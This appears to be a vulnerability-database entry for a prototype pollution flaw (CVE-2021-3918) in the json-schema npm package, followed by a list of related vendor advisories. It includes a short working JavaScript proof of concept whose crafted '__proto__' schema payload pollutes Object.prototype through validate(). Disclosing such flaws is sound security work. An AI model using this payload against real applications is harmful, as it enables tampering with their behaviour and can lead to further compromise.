Lucene search
Yoshino-sBB6CCD63-F505-4E3A-B55F-CD2662C261A9HistoryOct 03, 2021 - 1:08 p.m.
Prototype Pollution in kriszyp/json-schema
2021-10-0313:08:43
yoshino-s
www.huntr.dev
32
0.005 Low
EPSS
Percentile
75.7%
Description
A constructed payload sent to validate will lead to prototype pollution.
Proof of Concept
// PoC.js
const { validate } = require("json-schema");
const instance = JSON.parse(`
{
"$schema":{
"type": "object",
"properties":{
"__proto__": {
"type": "object",
"properties":{
"polluted": {
"type": "string",
"default": "polluted"
}
}
}
},
"__proto__": {}
}
}`);
const a = {};
console.log(a.polluted);
validate(instance);
console.log(a.polluted);
Impact
This vulnerability is capable of make prototype pollution
Related
nessus
nessus
Debian DLA-3228-1 : node-json-schema - LTS security update
2022-12-07 00:00:00
Ubuntu 18.04 LTS / 20.04 LTS : JSON Schema vulnerability (USN-6103-1)
2023-05-24 00:00:00
openSUSE 15 Security Update : nodejs14 (openSUSE-SU-2022:0715-1)
2022-03-05 00:00:00
ubuntucve
ubuntucve
CVE-2021-3918
2021-11-13 00:00:00
debian
debian
[SECURITY] [DLA 3228-1] node-json-schema security update
2022-12-06 19:15:29
ibm
ibm
openvas
openvas
Ubuntu: Security Advisory (USN-6103-1)
2023-05-25 00:00:00
Mageia: Security Advisory (MGASA-2022-0463)
2022-12-14 00:00:00
Debian: Security Advisory (DLA-3228-1)
2022-12-07 00:00:00
mageia
mageia
Updated nodejs-json-schema packages fix security vulnerability
2022-12-14 01:09:19
osv
osv
node-json-schema - security update
2022-12-07 00:00:00
CVE-2021-3918
2021-11-13 09:15:06
node-json-schema vulnerability
2023-05-24 11:08:39
nvd
nvd
CVE-2021-3918
2021-11-13 09:15:06
cvelist
cvelist
CVE-2021-3918 Prototype Pollution in kriszyp/json-schema
2021-11-13 00:00:00
cve
cve
CVE-2021-3918
2021-11-13 09:15:06
veracode
veracode
Prototype Pollution
2021-11-15 04:42:48
ubuntu
ubuntu
JSON Schema vulnerability
2023-05-24 00:00:00
prion
prion
Code injection
2021-11-13 09:15:00
redhatcve
redhatcve
CVE-2021-3918
2021-11-18 18:01:43
github
github
json-schema is vulnerable to Prototype Pollution
2021-11-19 20:16:17
cnvd
cnvd
json-schema has an unspecified vulnerability
2021-11-16 00:00:00
debiancve
debiancve
CVE-2021-3918
2021-11-13 09:15:06
suse
suse
Security update for nodejs12 (important)
2022-03-02 00:00:00
Security update for nodejs8 (important)
2022-03-04 00:00:00
Security update for nodejs14 (important)
2022-03-04 00:00:00
redhat
redhat
almalinux
almalinux
Moderate: nodejs:16 security, bug fix, and enhancement update
2021-12-15 19:09:29
Moderate: nodejs:14 security, bug fix, and enhancement update
2022-02-01 20:08:39
rocky
rocky
nodejs:16 security, bug fix, and enhancement update
2021-12-15 19:09:29
nodejs:14 security, bug fix, and enhancement update
2022-02-01 20:08:39
12 bug fix and enhancement update
2022-06-21 11:47:44
oraclelinux
oraclelinux
nodejs:16 security, bug fix, and enhancement update
2021-12-16 00:00:00
nodejs:14 security, bug fix, and enhancement update
2022-02-02 00:00:00
redos
redos
ROS-20240403-01
2024-04-03 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - January 2023
2023-01-17 00:00:00
Oracle Critical Patch Update Advisory - October 2022
2022-10-18 00:00:00
Oracle Critical Patch Update Advisory - April 2023
2023-04-18 00:00:00